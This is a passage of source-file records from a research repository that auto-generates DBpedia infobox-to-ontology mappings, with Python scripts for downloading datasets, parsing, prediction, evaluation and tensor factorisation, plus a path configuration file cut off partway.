"alphanum_fraction": 0.6515892148017883, "avg_line_length": 34.05714416503906, "blob_id": "4600c8b9a888ce2275611a51f8d723cd3f14dcce", "content_id": "3b57931d60e1869fedce4f99866b3d9610113e76", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2454, "license_type": "permissive", "max_line_length": 129, "num_lines": 70, "path": "/Code/workflow.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import os\nfrom optparse import OptionParser\nimport config\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivots\", help=\"pivot languages\")\n\tparser.add_option(\"-L\", default=0.5, type=\"float\", dest=\"L\", help=\"parameter to tune the tradeoff between precision and recall\")\n\tparser.add_option(\"-C\", default=10, type=\"int\", dest=\"C\", help=\"minimum occurrence of an infobox\")\n\tparser.add_option(\"-e\", default=False, action=\"store_true\", dest=\"evaluate\", help=\"evaluate the predicted mapping\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef main(options):\n\tlang = options.lang\n\tpivots = options.pivots.split(\"|\")\n\tL = options.L\n\tC = options.C\n\tflag = options.evaluate\n\n\tif not os.path.isdir(config.DATA_DIR + \"/mapping\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/mapping\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.DATA_DIR + \"/article\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/article\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.DATA_DIR + \"/article\"):\n\t\tcmd = \"mkdir %s\" % (config.DATA_DIR + \"/article\")\n\t\tos.system(cmd)\n\n\tcmd = \"python download.py -l %s\" % lang\n\tos.system(cmd)\n\n\tfor pivot in pivots:\n\t\tcmd = \"python download.py -l %s\" % pivot\n\t\tos.system(cmd)\n\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/template2article\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/template2article\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/article2template\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/article2template\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/link\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/link\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/mapping\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/mapping\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/matrix\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/matrix\")\n\t\tos.system(cmd)\n\tif not os.path.isdir(config.OUTPUT_DIR + \"/predicted\"):\n\t\tcmd = \"mkdir %s\" % (config.OUTPUT_DIR + \"/predicted\")\n\t\tos.system(cmd)\n\t\n\tfor pivot in pivots:\n\t\tcmd = \"python parse.py -l %s -p %s\" % (lang, pivot)\n\t\tos.system(cmd)\n\t\n\tcmd = \"python predict.py -l %s -p \\\"%s\\\" -L %f -C %d\" % (lang, options.pivots, L, C)\n\tif flag:\n\t\tcmd += \" -e\"\n\tos.system(cmd)\n\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.78125, "alphanum_fraction": 0.78125, "avg_line_length": 31, "blob_id": "5e27a6aff2dcc3cc441e33c64f628e36cc2656f5", "content_id": "d1e073f04eeae947ea7edc84d7e06ee99f9deb73", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "permissive", "max_line_length": 31, "num_lines": 1, "path": "/Output/README.md", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# Directory to store the output\n" }, { "alpha_fraction": 0.6555555462837219, "alphanum_fraction": 0.6694444417953491, "avg_line_length": 22.225807189941406, "blob_id": "880ddd339cd4c2a32b3fc563709b15afd6e43883", "content_id": "ae9cc79dbeaa5373141bafb7ccc914ab8122aaac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 720, "license_type": "permissive", "max_line_length": 75, "num_lines": 31, "path": "/Code/ontology.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nfrom utils import time_utils, pkl_utils\nimport rdflib.graph as g\n\ndef main():\n\tprint \"[%s]: generate ontology hierarchy tree\" % (time_utils._timestamp())\n\tG = g.Graph()\n\tG.parse(config.ONTOLOGY, format=\"n3\")\n\n\tq = '''\nPREFIX rr: <http://www.w3.org/2000/01/rdf-schema#>\n\nSELECT ?child ?parent\nWHERE {\n\t?child rr:subClassOf ?parent .\n}'''\n\t\n\tresults = G.query(q)\n\tontologyDict = {}\n\tfor row in results:\n\t\tchild = str(row[0])\n\t\tparent = str(row[1])\n\t\tif parent in ontologyDict:\n\t\t\tontologyDict[parent].append(child)\n\t\telse:\n\t\t\tontologyDict[parent] = [child,]\n\tpkl_utils._save(config.ONTOLOGY_TREE, ontologyDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\nif __name__ == \"__main__\":\n\tmain()\n" }, { "alpha_fraction": 0.6612903475761414, "alphanum_fraction": 0.6612903475761414, "avg_line_length": 19.66666603088379, "blob_id": "b063d21a1e780f09b184d6b1d17d26334fa95e3d", "content_id": "30419f96343cc7936e0285d3e683814d005a111f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "permissive", "max_line_length": 41, "num_lines": 6, "path": "/Code/utils/time_utils.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import datetime\n\ndef _timestamp():\n\tnow = datetime.datetime.now()\n\tnow_str = now.strftime(\"%Y-%m-%d-%H-%M\")\n\treturn now_str\n" }, { "alpha_fraction": 0.5233786106109619, "alphanum_fraction": 0.5716440677642822, "avg_line_length": 23.481481552124023, "blob_id": "b4aa883f7983ec86fd024dd1ec94d3fe22f511af", "content_id": "b832c614c9b4a2f187c07f02c11cfc693332e743", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 96, "num_lines": 27, "path": "/Code/experiment.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import os\nimport pandas as pd\n\ndef main():\n\tlang = \"bg\"\n\tpivots = \"en|de|it|fr|pt|es\"\n\tC = 10\n\tLs = [0.1, 0.3, 0.5, 0.7, 0.9]\n\t#L = 0.5\n\t#Cs = [10, 20, 30, 50, 100]\n\tPs = []; Rs = []\n\tfor L in Ls:\n\t\tcmd = \"python workflow.py -l %s -p \\\"%s\\\" -L %f -C %d -e -w > test.txt\" % (lang, pivots, L, C)\n\t\tos.system(cmd)\n\t\tinfile = open(\"test.txt\")\n\t\tcontents = infile.readlines()\n\t\tprecision = float(contents[6][11:].strip())\n\t\trecall = float(contents[7][11:].strip())\n\t\tprint precision, recall\n\t\tPs.append(precision)\n\t\tRs.append(recall)\n\tdf = pd.DataFrame({\"L\":Ls, \"precision\":Ps, \"recall\":Rs})\n\tdf.to_csv(\"data4.csv\", index=False)\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n" }, { "alpha_fraction": 0.6364883184432983, "alphanum_fraction": 0.6554641127586365, "avg_line_length": 28.958904266357422, "blob_id": "eef7ce4346b22ab87e424bbdc91b2eed3433fb22", "content_id": "294e3686f7f5ab52523868e2feab43d2bef4ab3d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4374, "license_type": "permissive", "max_line_length": 129, "num_lines": 146, "path": "/Code/predict.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nimport pandas as pd\nfrom utils import time_utils, pkl_utils\nfrom optparse import OptionParser\nfrom collections import defaultdict\nimport os.path\nimport parse\n\nG = pkl_utils._load(config.ONTOLOGY_TREE)\nRoot = \"http://www.w3.org/2002/07/owl#Thing\"\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivots\", help=\"pivot lanuages\")\n\tparser.add_option(\"-L\", default=0.5, type=\"float\", dest=\"L\", help=\"parameter to tune the tradeoff between precision and recall\")\n\tparser.add_option(\"-C\", default=10, type=\"int\", dest=\"C\", help=\"minimum occuurrence of an infobox\")\n\tparser.add_option(\"-e\", default=False, action=\"store_true\", dest=\"evaluate\", help=\"evaluate the predicted mapping\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef lca(root, e1, e2):\n\tif (root == e1) or (root == e2):\n\t\treturn root\n\tif not G.has_key(root):\n\t\treturn 0\n\tnodeList = []\n\tfor child in G[root]:\n\t\tnode = lca(child, e1, e2)\n\t\tif node != 0:\n\t\t\tnodeList.append(node)\n\tif len(nodeList) > 1:\n\t\treturn root\n\telif len(nodeList) == 1:\n\t\treturn nodeList[0]\n\telse:\n\t\treturn 0\n\ndef isin(root, node):\n\tif root == node:\n\t\treturn True\n\tif not G.has_key(root):\n\t\treturn False\n\tflag = False\n\tfor child in G[root]:\n\t\tflag |= isin(child, node)\n\treturn flag\n\ndef assign2(t1, t2):\n\tif t1 == config.MISSING_VALUE_STRING:\n\t\treturn t2\n\tif t2 == config.MISSING_VALUE_STRING:\n\t\treturn t1\n\tif t1 == t2:\n\t\treturn t1\n\tans = lca(Root, t1, t2)\n\tif ans == t1:\n\t\treturn t2\n\tif ans == t2:\n\t\treturn t1\n\tif ans == 0:\n\t\tprint t1, t2\n\t\tprint isin(Root, t1), isin(Root, t2)\n\t\tprint G.has_key(t1), G.has_key(t2)\n\treturn ans\n\ndef assign(typeString):\n\ttypes = typeString.split(\"\\t\")\n\tans = assign2(types[0], types[1])\n\tfor t in types[2:]:\n\t\tans = assign2(ans, t)\n\treturn ans\n\ndef main(options):\n\tlang = options.lang\n\tpivots = options.pivots.split(\"|\")\n\tL = options.L\n\tC = options.C\n\tflag = options.evaluate\n\tprint \"[%s]: predict the mapping for language %s\" % (time_utils._timestamp(), lang)\n\n\tdrop_columns = [\"template2\", \"article2\"]\n\tdfList = []\n\tfor pivot in pivots:\n\t\tdf = pd.read_csv(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)])\n\t\tdf = df.drop(drop_columns, axis=1)\n\t\tdf = df.rename(columns={\"ontology\":pivot})\n\t\tdfList.append(df)\n\tdf = dfList[0]\n\tfor df0 in dfList[1:]:\n\t\tdf = pd.merge(df, df0, on=[\"article1\", \"template1\"], how=\"outer\")\n\t#print df.shape[0]\n\tmsk = df[pivots[0]].notnull()\n\tfor pivot in pivots[1:]:\n\t\tmsk |= df[pivot].notnull()\n\tdf = df[msk]\n\tdf = df.fillna(config.MISSING_VALUE_STRING)\n\tdf[\"str\"] = df[pivots[0]]\n\tfor pivot in pivots[1:]:\n\t\tdf[\"str\"] = df[\"str\"] + \"\\t\" + df[pivot]\n\tdf[\"ontology\"] = df[\"str\"].apply(assign)\n\tgrouped = df.groupby(\"template1\")\n\ttemplate = []; ontology = []; occurrence = []; frequency = []\n\tfor name, group in grouped:\n\t\tclassDict = defaultdict(int)\n\t\tfor o in group[\"ontology\"]:\n\t\t\tclassDict[o] += 1\n\t\tN = group.shape[0]\n\t\tc = sorted(classDict, key=classDict.get, reverse=True)[0]\n\t\ttemplate.append(name)\n\t\tontology.append(c)\n\t\toccurrence.append(N)\n\t\tfrequency.append(1.0*classDict[c]/N)\n\tdata = {\"template\":template, \"ontology\":ontology, \"occurrence\":occurrence, \"frequency\":frequency}\n\tres = pd.DataFrame(data)\n\tmsk = (res[\"occurrence\"] > C) & (res[\"frequency\"] > L)\n\tres = res[msk]\n\tres.to_csv(config.MAPPED_INFOBOX[lang], index=False)\n\tprint \"[%s]: prediction complete complete\" % time_utils._timestamp()\n\n\tif flag:\n\t\tif not os.path.isfile(config.EXISTING_MAPPING_OUTPUT[lang]):\n\t\t\tparse.getExistingMapping(lang=lang)\n\t\tprint \"[%s]: evaluate the predicted mapping\" % time_utils._timestamp()\n\t\tmapping = pd.read_csv(config.EXISTING_MAPPING_OUTPUT[lang], index_col=\"template\")\n\t\tTP = 0 ; FP = 0\n\t\tfor t, o in zip(res[\"template\"], res[\"ontology\"]):\n\t\t\tif t in mapping.index:\n\t\t\t\tlabel = mapping.loc[t, \"ontology\"]\n\t\t\t\tancestor = lca(Root, o, label)\n\t\t\t\tif (o == label) or (o == ancestor):\n\t\t\t\t\tTP += 1\n\t\t\t\telse:\n\t\t\t\t\tFP += 1\n\t\tM = mapping.shape[0]\n\t\tprint \"True positives: %d\" % TP\n\t\tprint \"False positives: %d\" % FP\n\t\tprint \"False negatives: %d\" % (M-TP)\n\t\tprint \"precision: %3f\" % (1.0*TP/(TP + FP))\n\t\tprint \"recall: %3f\" % (1.0*TP/M)\n\n\t\tprint \"[%s]: evaluation complete\" % time_utils._timestamp()\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6837739944458008, "alphanum_fraction": 0.6951788663864136, "avg_line_length": 43.86046600341797, "blob_id": "b8ab1e28969469c1e88eb3fa8a547e53ca14bd2d", "content_id": "45a6b1d3897246002b1ddbe7d4c4c7f8fc52d7ac", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1929, "license_type": "permissive", "max_line_length": 148, "num_lines": 43, "path": "/Code/download.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import config\nimport os\nfrom optparse import OptionParser\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language to download\")\n\t#parser.add_option(\"-m\", \"--mapping\", default=True, action=\"store_false\", dest=\"mapping\", help=\"don't download dataset for existing mappings\")\n\t#parser.add_option(\"-a\", \"--article\", default=True, action=\"store_false\", dest=\"article\", help=\"don't download dataset for article template links\")\n\t#parser.add_option(\"-i\", \"--inter\", default=True, action=\"store_false\", dest=\"inter\", help=\"don't download dataset for interlanguage links\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef main(options):\n\tlang = options.lang\n\t#mapping = options.mapping\n\t#article = options.article\n\t#inter = options.inter\n\n\t# Download dataset for existing mappings\n\tif not os.path.isfile(config.EXISTING_MAPPING[lang]):\n\t\tcmd = \"wget -P %s http://mappings.dbpedia.org/server/mappings/%s/pages/rdf/all\" % (config.DATA_DIR + \"/mapping/\", lang)\n\t\tos.system(cmd)\n\t\tcmd = \"mv %s %s\" % (config.DATA_DIR + \"/mapping/all\", config.EXISTING_MAPPING[lang])\n\t\tos.system(cmd)\n\n\t# Download dataset for article template links\n\tif not os.path.isfile(config.ARTICLE_TEMPLATES[lang]):\n\t\tcmd = \"wget -P %s http://downloads.dbpedia.org/2015-10/core-i18n/%s/article_templates_%s.ttl.bz2\" % (config.DATA_DIR + \"/article/\", lang, lang)\n\t\tos.system(cmd)\n\t\tcmd = \"bunzip2 %s\" % (config.ARTICLE_TEMPLATES[lang] + \".bz2\")\n\t\tos.system(cmd)\n\n\t# Download dataset for interlanguage links\n\tif not os.path.isfile(config.ILL[lang]):\n\t\tcmd = \"wget -P %s http://downloads.dbpedia.org/2015-10/core-i18n/%s/interlanguage_links_%s.ttl.bz2\" % (config.DATA_DIR + \"/link/\", lang, lang)\n\t\tos.system(cmd)\n\t\tcmd = \"bunzip2 %s\" % (config.ILL[lang] + \".bz2\")\n\t\tos.system(cmd)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6579894423484802, "alphanum_fraction": 0.6725925803184509, "avg_line_length": 32.2746467590332, "blob_id": "046b62ab6fd771c2ee813dd29f33f9bf045a2d06", "content_id": "da10b012c8a42cbbf1656f00de536e733cabc1e5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4725, "license_type": "permissive", "max_line_length": 120, "num_lines": 142, "path": "/Code/hole.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.sparse as spsp\nimport pandas as pd\nfrom rescal import rescal_als\nimport config\nfrom optparse import OptionParser\nfrom utils import time_utils, pkl_utils\nimport os\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n_log = logging.getLogger('Tensor Factorization for DBpedia')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"en\", type=\"string\", dest=\"lang\", help=\"specify the language\")\n\tparser.add_option(\"-p\", \"--parse\", default=False, action=\"store_true\", dest=\"parse\", help=\"enable the parsing module\")\n\tparser.add_option(\"-t\", \"--train\", default=False, action=\"store_true\", dest=\"train\", help=\"enable the training module\")\n\tparser.add_option(\"-c\", \"--ncomp\", default=150, type=\"int\", dest=\"ncomp\", help=\"number of components\")\n\tparser.add_option(\"-e\", \"--me\", default=500, type=\"int\", dest=\"me\", help=\"maximum epoches\")\n\tparser.add_option(\"--fin\", type=\"string\", dest=\"fin\", help=\"the path of input file\")\n\tparser.add_option(\"--fout\", type=\"string\", dest=\"fout\", help=\"the path of output file\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef parse(lang=\"en\"):\n\tdataDict = {}\n\t\n\tinfile = open(config.INSTANCE_TYPES[lang])\n\trdf_type = \"http://www.w3.org/1999/02/22-rdf-syntax-ns#type\"\n\ttype_entries = []\n\tentitySet = set()\n\ttypeSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tinstance = row[0][1:-1]\n\t\tontology = row[2][1:-1]\n\t\ttype_entries.append((instance, ontology))\n\t\tentitySet.add(ontology)\n\t\ttypeSet.add(ontology)\n\ttypeDict = {y:x for x, y in enumerate(typeSet)}\n\tinfile.close()\n\n\tcnt_type = len(entitySet)\n\t_log.info(\"%d types\" % cnt_type)\n\n\tinfile = open(config.OBJECTS[lang])\n\trelationDict = {}\n\tinstanceSet = set()\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tsubject = row[0][1:-1]\n\t\tpredicate = row[1][1:-1]\n\t\ttarget = row[2][1:-1]\n\t\tentitySet.add(subject)\n\t\tentitySet.add(target)\n\t\tinstanceSet.add(subject)\n\t\tinstanceSet.add(target)\n\t\tif predicate in relationDict:\n\t\t\trelationDict[predicate].append((subject, target))\n\t\telse:\n\t\t\trelationDict[predicate] = [(subject, target)]\n\tinstanceDict = {y:x for x, y in enumerate(instanceSet)}\n\tentityDict = {y:x for x, y in enumerate(entitySet)}\n\tinfile.close()\n\n\tcnt_ins = len(instanceSet)\n\tN = len(entitySet)\n\t_log.info(\"%d instanes\" % cnt_ins)\n\t_log.info(\"%d entites\" % N)\n\t\n\ttriples = []\n\tpredicateDict = {}\n\tcnt = 0\n\tfor predicate in relationDict:\n\t\tentries = relationDict[predicate]\n\t\tsub = [entityDict[entry[0]] for entry in entries]\n\t\tobj = [entityDict[entry[1]] for entry in entries]\n\t\tpred = [cnt for entry in entries]\n\t\ttriples.extend(zip(sub, obj, pred))\n\t\tpredicateDict[cnt] = predicate\n\t\tcnt += 1\n\ttype_entries = [entry for entry in type_entries if entry[0] in instanceSet]\n\tsub = [entityDict[entry[0]] for entry in type_entries]\n\tobj = [entityDict[entry[1]] for entry in type_entries]\n\tpred = [cnt for entry in type_entries]\n\ttriples.extend(zip(sub, obj, pred))\n\tpredicateDict[cnt] = rdf_type\n\ttriples = pd.Series(triples)\n\t_log.info(\"%d relations\" % (cnt+1))\n\t_log.info(\"%d triples\" % len(triples))\n\n\tdataDict[\"entities\"] = list(entitySet)\n\tdataDict[\"relations\"] = predicateDict.values()\n\tIDX = list(range(len(triples)))\n\tshuffle(IDX)\n\tdataDict[\"train_subs\"] = list(triples[IDX[:-20000]])\n\tdataDict[\"valid_subs\"] = list(triples[IDX[-20000:-10000]])\n\tdataDict[\"test_subs\"] = list(triples[IDX[-10000:]])\n\tpkl_utils._save(config.DATA_DICT[lang], dataDict)\n\n\t_log.info(\"train size: %d\" % len(dataDict[\"train_subs\"]))\n\t_log.info(\"valid size: %d\" % len(dataDict[\"valid_subs\"]))\n\t_log.info(\"test size: %d\" % len(dataDict[\"test_subs\"]))\n\n\t_log.info(\"parsing complete\")\n\ndef main(options):\n\tlang = options.lang\n\tp = options.parse\n\tt = options.train\n\tncomp = options.ncomp\n\tme = options.me\n\tfin = options.fin\n\tfout = options.fout\n\n\tif p:\n\t\tparse(lang)\n\tif t:\n\t\tcmd = \"python run_hole.py --fin %s --fout %s --test-all 50 --nb 100 --me %d \\\n\t\t\t--margin 0.2 --lr 0.1 --ncomp %d\" % (lang, config.HOLE_OUTPUT[lang], me, ncomp)\n\t\tos.system(cmd)\n\t\n\thole = pkl_utils._load(config.HOLE_OUTPUT[lang])\n\tdata_dict = pkl_utils._load(config.DATA_DICT[lang])\n\tmodel = hole[\"model\"]\n\tentityDict = { y:x for x, y in enumerate(data_dict[\"entities\"])}\n\tpredicateDict = { y:x for x, y in enumerate(data_dict[\"relations\"])}\n\tdf = pd.read_csv(fin, names=[\"s\", \"p\", \"o\"])\n\tdf[\"s\"] = df[\"s\"].map(entityDict)\n\tdf[\"p\"] = df[\"p\"].map(predicateDict)\n\tdf[\"o\"] = df[\"o\"].map(entityDict)\n\tscores = model._scores(list(df[\"s\"]), list(df[\"p\"]), list(df[\"o\"]))\n\tpd.DataFrame(scores).to_csv(fout, index=False, header=False)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6039702296257019, "alphanum_fraction": 0.6142680048942566, "avg_line_length": 34.043479919433594, "blob_id": "fc3b2cd86ce2a544ef6ef0a5fec6c0ec08ac1cec", "content_id": "b1a5d4aa5e8458e793b7d47db497503914e1797b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8069, "license_type": "permissive", "max_line_length": 63, "num_lines": 230, "path": "/Code/config.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# --------------------- PATH ---------------------------\n\n# Set the paths for data directory and output directory\nROOT_DIR = \"/nfs/data1/pxu4\"\nDATA_DIR = \"%s/DBpedia/Data\" % ROOT_DIR\nOUTPUT_DIR = \"%s/DBpedia/Output\" % ROOT_DIR\n\nONTOLOGY = \"%s/dbpedia_2015-10.nt\" % DATA_DIR\nONTOLOGY_TREE = \"%s/ontology.pkl\" % OUTPUT_DIR\n\nEXISTING_MAPPING = {\n\t\"en\" : \"%s/mapping/existing_mapping_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/mapping/existing_mapping_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/mapping/existing_mapping_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/mapping/existing_mapping_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/mapping/existing_mapping_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/mapping/existing_mapping_es.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/mapping/existing_mapping_bg.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/mapping/existing_mapping_zh.ttl\" % DATA_DIR,\n}\n\nEXISTING_MAPPING_OUTPUT = {\n\t\"en\" : \"%s/mapping/existing_mapping_en.csv\" % OUTPUT_DIR,\n\t\"de\" : \"%s/mapping/existing_mapping_de.csv\" % OUTPUT_DIR,\n\t\"it\" : \"%s/mapping/existing_mapping_it.csv\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/mapping/existing_mapping_pt.csv\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/mapping/existing_mapping_fr.csv\" % OUTPUT_DIR,\n\t\"es\" : \"%s/mapping/existing_mapping_es.csv\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/mapping/existing_mapping_bg.csv\" % OUTPUT_DIR,\n}\n\nINSTANCE_TYPES = {\n\t\"en\" : \"%s/type/instance_types_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/type/instance_types_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/type/instance_types_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/type/instance_types_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/type/instance_types_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/type/instance_types_es.ttl\" % DATA_DIR,\n\t\"wikidata\" : \"%s/type/instance_types_wikidata.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/type/instance_types_bg.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/type/instance_types_zh.ttl\" % DATA_DIR,\n}\n\nLITERALS = {\n\t\"en\" : \"%s/property/mappingbased_literals_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/property/mappingbased_literals_de.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/property/mappingbased_literals_bg.ttl\" % DATA_DIR,\n}\n\nOBJECTS = {\n\t\"en\" : \"%s/property/mappingbased_objects_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/property/mappingbased_objects_de.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/property/mappingbased_objects_bg.ttl\" % DATA_DIR,\n}\n\nENTITY = {\n\t\"en\" : \"%s/tensor/entity_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/entity_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/entity_bg.pkl\" % OUTPUT_DIR,\n}\n\nPREDICATE = {\n\t\"en\" : \"%s/tensor/predicate_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/predicate_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/predicate_bg.pkl\" % OUTPUT_DIR,\n}\n\nTENSOR = {\n\t\"en\" : \"%s/tensor/tensor_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/tensor_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/tensor_bg.pkl\" % OUTPUT_DIR,\n}\n\nINSTANCE = {\n\t\"en\" : \"%s/tensor/instance_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/instance_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/instance_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE = {\n\t\"en\" : \"%s/tensor/type_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/type_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/type_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE_MATRIX = {\n\t\"en\" : \"%s/tensor/type_matrix_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/type_matrix_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/type_matrix_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE_DICT = {\n\t\"en\" : \"%s/type/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/type/de.pkl\" % OUTPUT_DIR,\n\t\"it\" : \"%s/type/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/type/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/type/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/type/es.pkl\" % OUTPUT_DIR,\n\t\"wikidata\" : \"%s/type/wikidata.pkl\" % OUTPUT_DIR,\n}\n\nARTICLE_TEMPLATES = {\n\t\"en\" : \"%s/article/article_templates_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/article/article_templates_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/article/article_templates_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/article/article_templates_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/article/article_templates_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/article/article_templates_es.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/article/article_templates_zh.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/article/article_templates_bg.ttl\" % DATA_DIR,\n}\n\nTEMPLATE2ARTICLE = {\n\t\"en\" : \"%s/template2article/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/template2article/de.pkl\" % OUTPUT_DIR,\n\t\"it\" : \"%s/template2article/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/template2article/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/template2article/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/template2article/es.pkl\" % OUTPUT_DIR,\n\t\"zh\" : \"%s/template2article/zh.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/template2article/bg.pkl\" % OUTPUT_DIR,\n}\n\nARTICLE2TEMPLATE = {\n\t\"en\" : \"%s/article2template/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/article2template/de.pkl\" % 